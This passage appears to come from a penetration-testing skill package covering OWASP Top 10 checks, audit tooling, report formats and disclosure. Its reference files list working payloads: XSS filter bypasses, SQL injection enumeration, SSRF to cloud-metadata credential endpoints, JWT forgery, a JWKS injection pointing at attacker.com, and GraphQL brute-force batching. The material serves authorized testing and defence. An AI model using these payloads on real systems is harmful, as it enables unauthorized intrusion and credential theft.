| A07 | Auth Failures | Brute force, session cookie flags, session invalidation, MFA bypass |
| A08 | Integrity Failures | Unsafe deserialization, SRI checks, CI/CD pipeline integrity |
| A09 | Logging Failures | Auth event logging, sensitive data in logs, alerting thresholds |
| A10 | SSRF | Internal IP access, cloud metadata endpoints, DNS rebinding |
```bash
# Audit dependencies
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
See [owasp_top_10_checklist.md](references/owasp_top_10_checklist.md) for detailed test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance for each category.
---
## Static Analysis
**Recommended tools:** CodeQL (custom queries for project-specific patterns), Semgrep (rule-based scanning with auto-fix), ESLint security plugins (`eslint-plugin-security`, `eslint-plugin-no-unsanitized`).
Key patterns to detect: SQL injection via string concatenation, hardcoded JWT secrets, unsafe YAML/pickle deserialization, missing security middleware (e.g., Express without Helmet).
See [attack_patterns.md](references/attack_patterns.md) for code patterns and detection payloads across injection types.
---
## Dependency Vulnerability Scanning
**Ecosystem commands:** `npm audit`, `pip audit`, `govulncheck ./...`, `bundle audit check`
**CVE Triage Workflow:**
1. **Collect** — Run ecosystem audit tools, aggregate findings
2. **Deduplicate** — Group by CVE ID across direct and transitive deps
3. **Prioritize** — Critical + exploitable + reachable = fix immediately
4. **Remediate** — Upgrade, patch, or mitigate with compensating controls
5. **Verify** — Rerun audit to confirm fix, update lock files
```bash
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
---
## Secret Scanning
**Tools:** TruffleHog (git history + filesystem), Gitleaks (regex-based with custom rules).
```bash
# Scan git history for verified secrets
trufflehog git file://. --only-verified --json
# Scan filesystem
trufflehog filesystem . --json
```
**Integration points:** Pre-commit hooks (gitleaks, trufflehog), CI/CD gates (GitHub Actions with `trufflesecurity/trufflehog@main`). Configure `.gitleaks.toml` for custom rules (AWS keys, API keys, private key headers) and allowlists for test fixtures.
---
## API Security Testing
### Authentication Bypass
- **JWT manipulation:** Change `alg` to `none`, RS256-to-HS256 confusion, claim modification (`role: "admin"`, `exp: 9999999999`)
- **Session fixation:** Check if session ID changes after authentication
### Authorization Flaws
- **IDOR/BOLA:** Change resource IDs in every endpoint — test read, update, delete across users
- **BFLA:** Regular user tries admin endpoints (expect 403)
- **Mass assignment:** Add privileged fields (`role`, `is_admin`) to update requests
### Rate Limiting & GraphQL
- **Rate limiting:** Rapid-fire requests to auth endpoints; expect 429 after threshold
- **GraphQL:** Test introspection (should be disabled in prod), query depth attacks, batch mutations bypassing rate limits
See [attack_patterns.md](references/attack_patterns.md) for complete JWT manipulation payloads, IDOR testing methodology, BFLA endpoint lists, GraphQL introspection/depth/batch attack patterns, and rate limiting bypass techniques.
---
## Web Vulnerability Testing
| Vulnerability | Key Tests |
|--------------|-----------|
| **XSS** | Reflected (script/img/svg payloads), Stored (persistent fields), DOM-based (innerHTML + location.hash) |
| **CSRF** | Replay without token (expect 403), cross-session token replay, check SameSite cookie attribute |
| **SQL Injection** | Error-based (`' OR 1=1--`), union-based enumeration, time-based blind (`SLEEP(5)`), boolean-based blind |
| **SSRF** | Internal IPs, cloud metadata endpoints (AWS/GCP/Azure), IPv6/hex/decimal encoding bypasses |
| **Path Traversal** | `../../../etc/passwd`, URL encoding, double encoding bypasses |
See [attack_patterns.md](references/attack_patterns.md) for complete test payloads (XSS filter bypasses, context-specific XSS, SQL injection per database engine, SSRF bypass techniques, and DOM-based XSS source/sink pairs).
---
## Infrastructure Security
**Key checks:**
- **Cloud storage:** S3 bucket public access (`aws s3 ls s3://bucket --no-sign-request`), bucket policies, ACLs
- **HTTP security headers:** HSTS, CSP (no `unsafe-inline`/`unsafe-eval`), X-Content-Type-Options, X-Frame-Options, Referrer-Policy
- **TLS configuration:** `nmap --script ssl-enum-ciphers -p 443 target.com` or `testssl.sh` — reject TLS 1.0/1.1, RC4, 3DES, export-grade ciphers
- **Port scanning:** `nmap -sV target.com` — flag dangerous open ports (FTP/21, Telnet/23, Redis/6379, MongoDB/27017)
---
## Pen Test Report Generation
Generate professional reports from structured findings:
```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```
### Findings JSON Format
```json
[
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"]
}
]
```
### Report Structure
1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
---
## Responsible Disclosure Workflow
Responsible disclosure is **mandatory** for any vulnerability found during authorized testing. Standard timeline: report on day 1, follow up at day 7, status update at day 30, public disclosure at day 90.
**Key principles:** Never exploit beyond proof of concept, encrypt all communications, do not access real user data, document everything with timestamps.
See [responsible_disclosure.md](references/responsible_disclosure.md) for full disclosure timelines (standard 90-day, accelerated 30-day, extended 120-day), communication templates, legal considerations, bug bounty program integration, and CVE request process.
---
## Workflows
### Workflow 1: Quick Security Check (15 Minutes)
For pre-merge reviews or quick health checks:
```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick
# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high
# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in Secret Scanning section)
# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```
**Decision**: If any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)
**Day 1 — Reconnaissance:**
1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history
**Day 2 — Manual Testing:**
1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
**Day 3 — Infrastructure and Reporting:**
1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report
```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate
Automated security checks on every PR: secret scanning (TruffleHog), dependency audit (`npm audit`, `pip audit`), SAST (Semgrep with `p/security-audit`, `p/owasp-top-ten`), and security headers check on staging.
**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---
## Anti-Patterns
1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [senior-secops](../senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](../senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](../../engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](../code-reviewer/SKILL.md) | Code review practices — includes security review checklist |
FILE:references/attack_patterns.md
# Attack Patterns Reference
Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.
---
## XSS Test Payloads
### Reflected XSS
These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.
**Basic payloads:**
```
<script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
'><script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<body onload=alert(document.domain)>
<input onfocus=alert(document.domain) autofocus>
<marquee onstart=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
```
**Filter bypass payloads:**
```
<ScRiPt>alert(document.domain)</ScRiPt>
<scr<script>ipt>alert(document.domain)</scr</script>ipt>
<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
<img src=x onerror="alert(1)">
<svg/onload=alert(document.domain)>
javascript:alert(document.domain)//
```
**URL encoding payloads:**
```
%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```
**Context-specific payloads:**
Inside HTML attribute:
```
" onmouseover="alert(document.domain)
' onfocus='alert(document.domain)' autofocus='
```
Inside JavaScript string:
```
';alert(document.domain);//
\';alert(document.domain);//
</script><script>alert(document.domain)</script>
```
Inside CSS:
```
expression(alert(document.domain))
url(javascript:alert(document.domain))
```
### Stored XSS
Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.
```
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.domain)">click me</a>
<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
```
### DOM-Based XSS
Look for JavaScript that reads from these sources and writes to dangerous sinks:
**Sources** (attacker-controlled input):
```
document.location
document.location.hash
document.location.search
document.referrer
window.name
document.cookie
localStorage / sessionStorage
postMessage data
```
**Sinks** (dangerous output):
```
element.innerHTML
element.outerHTML
document.write()
document.writeln()
eval()
setTimeout(string)
setInterval(string)
new Function(string)
element.setAttribute("onclick", ...)
location.href = ...
location.assign(...)
```
**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.
---
## SQL Injection Detection Patterns
### Detection Payloads
**Error-based detection:**
```
' -- Single quote triggers SQL error
" -- Double quote
\ -- Backslash
' OR '1'='1 -- Boolean true
' OR '1'='2 -- Boolean false (compare responses)
' AND 1=1-- -- Boolean true with comment
' AND 1=2-- -- Boolean false (compare responses)
1 OR 1=1 -- Numeric injection
1 AND 1=2 -- Numeric false
```
**Union-based enumeration** (authorized testing only):
```sql
-- Step 1: Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- -- Increment until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL-- -- Match column count
-- Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
-- Step 3: Extract database info
' UNION SELECT version(),NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```
**Time-based blind injection:**
```sql
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)--
-- PostgreSQL
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--
```
**Boolean-based blind injection:**
```sql
-- Extract data one character at a time
' AND SUBSTRING(username,1,1)='a'--
' AND ASCII(SUBSTRING(username,1,1))>96--
' AND ASCII(SUBSTRING(username,1,1))>109-- -- Binary search
```
### Database-Specific Syntax
| Feature | MySQL | PostgreSQL | MSSQL | SQLite |
|---------|-------|------------|-------|--------|
| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` |
| Comment | `-- ` or `#` | `--` | `--` | `--` |
| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` |
| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A |
| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A |
---
## SSRF Detection Techniques
### Basic Payloads
```
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1] -- IPv6 localhost
http://[0000::1] -- IPv6 localhost (expanded)
```
### Cloud Metadata Endpoints
```
# AWS EC2 Metadata (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
# AWS EC2 Metadata (IMDSv2 — requires token header)
# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token
# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/
# GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/
# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token
# DigitalOcean Metadata
http://169.254.169.254/metadata/v1/
```
### Bypass Techniques
**IP encoding tricks:**
```
http://0x7f000001 -- Hex encoding of 127.0.0.1
http://2130706433 -- Decimal encoding of 127.0.0.1
http://0177.0.0.1 -- Octal encoding
http://127.1 -- Shortened
http://127.0.0.1.nip.io -- DNS rebinding via nip.io
```
**URL parsing inconsistencies:**
```
http://127.0.0.1@evil.com -- URL authority confusion
http://evil.com#@127.0.0.1 -- Fragment confusion
http://127.0.0.1%00@evil.com -- Null byte injection
http://evil.com\@127.0.0.1 -- Backslash confusion
```
**Redirect chains:**
```
# If the app follows redirects, find an open redirect first:
https://target.com/redirect?url=http://169.254.169.254/
```
---
## JWT Manipulation Patterns
### Decode Without Verification
JWTs are Base64URL-encoded and can be decoded without the secret:
```bash
# Decode header
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
# Output: {"alg":"HS256"}
# Decode payload
echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d
# Output: {"user":"admin"}
```
### Algorithm Confusion Attacks
**None algorithm attack:**
```json
// Original header
{"alg": "HS256", "typ": "JWT"}
// Modified header — set algorithm to none
{"alg": "none", "typ": "JWT"}
// Token format: header.payload. (empty signature)
```
**RS256 to HS256 confusion:**
If the server uses RS256 (asymmetric), try:
1. Get the server's RSA public key (from JWKS endpoint or TLS certificate)
2. Change `alg` to `HS256`
3. Sign the token using the RSA public key as the HMAC secret
4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key
### Claim Manipulation
```json
// Common claims to modify:
{
"sub": "1234567890", // Change to another user's ID
"role": "admin", // Escalate from "user" to "admin"
"is_admin": true, // Toggle admin flag
"exp": 9999999999, // Extend expiration far into the future
"aud": "admin-api", // Change audience
"iss": "trusted-issuer" // Spoof issuer
}
```
### Weak Secret Brute Force
Common JWT secrets to try (if you have a valid token to test against):
```
secret
password
123456
your-256-bit-secret
jwt_secret
changeme
mysecretkey
HS256-secret
```
Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks.
### JWKS Injection
If the server fetches keys from a JWKS URL in the JWT header:
```json
{
"alg": "RS256",
"jku": "https://attacker.com/.well-known/jwks.json"
}
```
Host your own JWKS with a key pair you control.
---
## API Authorization Testing (IDOR, BOLA)
### IDOR Testing Methodology
**Step 1: Identify resource identifiers**
Map all API endpoints and find parameters that reference resources:
```
GET /api/users/{id}/profile
GET /api/orders/{orderId}
GET /api/documents/{docId}/download
PUT /api/users/{id}/settings
DELETE /api/comments/{commentId}
```
**Step 2: Create two test accounts**
- User A (attacker) and User B (victim)
- Authenticate as both and capture their tokens
**Step 3: Cross-account access testing**
Using User A's token, request User B's resources:
```
# Read
GET /api/users/{B_id}/profile → Should be 403
GET /api/orders/{B_orderId} → Should be 403
# Write
PUT /api/users/{B_id}/settings → Should be 403
PATCH /api/orders/{B_orderId} → Should be 403
# Delete
DELETE /api/comments/{B_commentId} → Should be 403
```
**Step 4: ID manipulation**
```
# Sequential IDs — increment/decrement
/api/users/100 → /api/users/101
# UUID prediction — not practical, but test for leaked UUIDs
# Check if UUIDs appear in other responses
# Encoded IDs — decode and modify
/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx
# Hash-based IDs — check for predictable hashing
/api/users/md5(email) → compute md5 of known emails
```
### BFLA (Broken Function Level Authorization)
Test access to administrative functions:
```
# As regular user, try admin endpoints:
POST /api/admin/users → 403
DELETE /api/admin/users/123 → 403
PUT /api/admin/settings → 403
GET /api/admin/reports → 403
POST /api/admin/impersonate/user123 → 403
# Try HTTP method override:
GET /api/admin/users with X-HTTP-Method-Override: DELETE
POST /api/admin/users with _method=DELETE
```
### Mass Assignment Testing
```json
// Normal user update request:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com"
}
// Mass assignment attempt — add privileged fields:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin",
"is_verified": true,
"is_admin": true,
"balance": 99999,
"subscription": "enterprise",
"permissions": ["admin", "superadmin"]
}
// Then check if any extra fields were persisted:
GET /api/users/profile
```
---
## GraphQL Security Testing Patterns
### Introspection Query
Use this to map the entire schema (should be disabled in production):
```graphql
{
__schema {
queryType { name }
mutationType { name }
types {
name
kind
fields {
name
type {
name
kind
ofType { name kind }
}
args { name type { name } }
}
}
}
}
```
### Query Depth Attack
Nested queries can cause exponential resource consumption:
```graphql
{
users {
friends {
friends {
friends {
friends {
friends {
friends {
name
}
}
}
}
}
}
}
}
```
**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth."
### Query Complexity Attack
Wide queries with aliases:
```graphql
{
a: users(limit: 1000) { name email }
b: users(limit: 1000) { name email }
c: users(limit: 1000) { name email }
d: users(limit: 1000) { name email }
e: users(limit: 1000) { name email }
}
```
### Batch Query Attack
Send multiple operations in a single request to bypass rate limiting:
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"}
]
```
### Field Suggestion Exploitation
GraphQL often suggests similar field names on typos:
```graphql
{ users { passwor } }
# Response: "Did you mean 'password'?"
```
Use this to discover hidden fields without full introspection.
### Authorization Bypass via Fragments
```graphql
query {
publicUser(id: 1) {
name
...on User {
email # Should be restricted
ssn # Should be restricted
creditCard # Should be restricted
}
}
}
```
---
## Rate Limiting Bypass Techniques
These techniques help verify that rate limiting is robust during authorized testing:
```
# IP rotation — test if rate limiting is per-IP only
X-Forwarded-For: 1.2.3.4
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
# Case variation — test if endpoints are case-sensitive
/api/login
/API/LOGIN
/Api/Login
# Path variation
/api/login
/api/login/
/api/./login
/api/login?dummy=1
# HTTP method variation
POST /api/login
PUT /api/login
# Unicode encoding
/api/logi%6E
```
If any of these bypass rate limiting, the implementation needs hardening.
---
## Static Analysis Tool Configurations
### CodeQL Custom Rules
Write custom CodeQL queries for project-specific vulnerability patterns:
```ql
/**
* Detect SQL injection via string concatenation
*/
import python
import semmle.python.dataflow.new.DataFlow
from Call call, StringFormatting fmt
where
call.getFunc().getName() = "execute" and
fmt = call.getArg(0) and
exists(DataFlow::Node source |
source.asExpr() instanceof Name and
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
)
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules
```yaml
rules:
- id: hardcoded-jwt-secret
pattern: |
jwt.encode($PAYLOAD, "...", ...)
message: "JWT signed with hardcoded secret"
severity: ERROR
languages: [python]
- id: unsafe-yaml-load
pattern: yaml.load($DATA)
fix: yaml.safe_load($DATA)
message: "Use yaml.safe_load() to prevent arbitrary code execution"
severity: WARNING
languages: [python]
- id: express-no-helmet
pattern: |
const app = express();
...
app.listen(...)
pattern-not: |
const app = express();
...
app.use(helmet(...));
...
app.listen(...)
message: "Express app missing helmet middleware for security headers"
severity: WARNING
languages: [javascript, typescript]
```
### ESLint Security Plugins
Recommended configuration:
```json
{
"plugins": ["security", "no-unsanitized"],
"extends": ["plugin:security/recommended"],
"rules": {
"security/detect-object-injection": "error",
"security/detect-non-literal-regexp": "warn",
"security/detect-unsafe-regex": "error",
"security/detect-buffer-noassert": "error",
"security/detect-eval-with-expression": "error",
"no-unsanitized/method": "error",
"no-unsanitized/property": "error"
}
}
```
FILE:references/owasp_top_10_checklist.md
# OWASP Top 10 (2021) — Detailed Security Checklist
Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance.
---
## A01:2021 — Broken Access Control
**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863
### Description
Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden |
| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden |
| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins |
| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 |
| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method |
| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized |
| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal |
| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond |
### Code Patterns to Detect
```python
# BAD: No authorization check on resource access
@app.route("/api/documents/<doc_id>")
def get_document(doc_id):
return Document.query.get(doc_id).to_json() # No ownership check!
# GOOD: Verify ownership
@app.route("/api/documents/<doc_id>")
@login_required
def get_document(doc_id):
doc = Document.query.get_or_404(doc_id)
if doc.owner_id != current_user.id:
abort(403)
return doc.to_json()
```
```javascript
// BAD: Client-side only access control
{isAdmin && <AdminPanel />} // Hidden but still accessible via API
// GOOD: Server-side middleware
app.use('/admin/*', requireRole('admin'));
```
### Remediation
1. Deny by default — require explicit authorization for every endpoint
2. Implement server-side access control, never rely on client-side checks
3. Use UUIDs instead of sequential IDs for resource identifiers
4. Log and alert on access control failures
5. Rate limit API requests to minimize automated enumeration
6. Disable CORS or restrict to specific trusted origins
7. Invalidate server-side sessions on logout
### CVSS Scoring Guidance
- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A02:2021 — Cryptographic Failures
**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331
### Description
Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted |
| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed |
| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` |
| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 |
| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params |
| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) |
| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files |
| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) |
### Code Patterns to Detect
```python
# BAD: MD5 for password hashing
password_hash = hashlib.md5(password.encode()).hexdigest()
# BAD: Hardcoded encryption key
cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM)
# BAD: Weak random for tokens
token = str(random.randint(100000, 999999))
# GOOD: bcrypt for passwords
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
# GOOD: Secrets module for tokens
token = secrets.token_urlsafe(32)
```
### Remediation
1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS
2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing
3. Use AES-256-GCM for encryption at rest
4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager)
5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation
6. Enable HSTS with preload
7. Never store sensitive data in URLs or logs
### CVSS Scoring Guidance
- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
---
## A03:2021 — Injection
**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89
### Description
Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling |
| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response |
| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage |
| 4 | XSS (reflected) | Submit `<script>alert(1)</script>` | Input is escaped/encoded in response |
| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage |
| 6 | Command injection | Submit `; whoami` in fields | No command execution |
| 7 | Template injection | Submit `{{7*7}}` | No "49" in response |
| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration |
### Code Patterns to Detect
```python
# BAD: String concatenation in SQL
cursor.execute("SELECT * FROM users WHERE email = '" + email + "'")
cursor.execute(f"SELECT * FROM users WHERE email = '{email}'")
# GOOD: Parameterized query
cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
```
```javascript
// BAD: Template literal in SQL
db.query(`SELECT * FROM users WHERE id = userId`);
// GOOD: Parameterized query
db.query('SELECT * FROM users WHERE id = $1', [userId]);
```
### Remediation
1. Use parameterized queries / prepared statements for ALL database operations
2. Use ORM methods with bound parameters (not raw queries)
3. Validate and sanitize all input on the server side
4. Use Content-Security-Policy to mitigate XSS impact
5. Escape output based on context (HTML, JS, URL, CSS)
6. Never pass user input to eval(), exec(), os.system(), or child_process
7. Use allowlists for expected input formats
### CVSS Scoring Guidance
- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A04:2021 — Insecure Design
**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522
### Description
Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) |
| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side |
| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered |
| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step |
| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated |
### Remediation
1. Use threat modeling during design phase (STRIDE, PASTA)
2. Implement rate limiting on all sensitive endpoints
3. Validate business logic on the server, never trust client calculations
4. Use state machines for multi-step workflows
5. Implement CAPTCHA for public-facing forms after threshold
### CVSS Scoring Guidance
- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
---
## A05:2021 — Security Misconfiguration
**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388
### Description
The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Default credentials | Try admin:admin, root:root | Rejected |
| 2 | Debug mode | Trigger application errors | No stack traces in response |
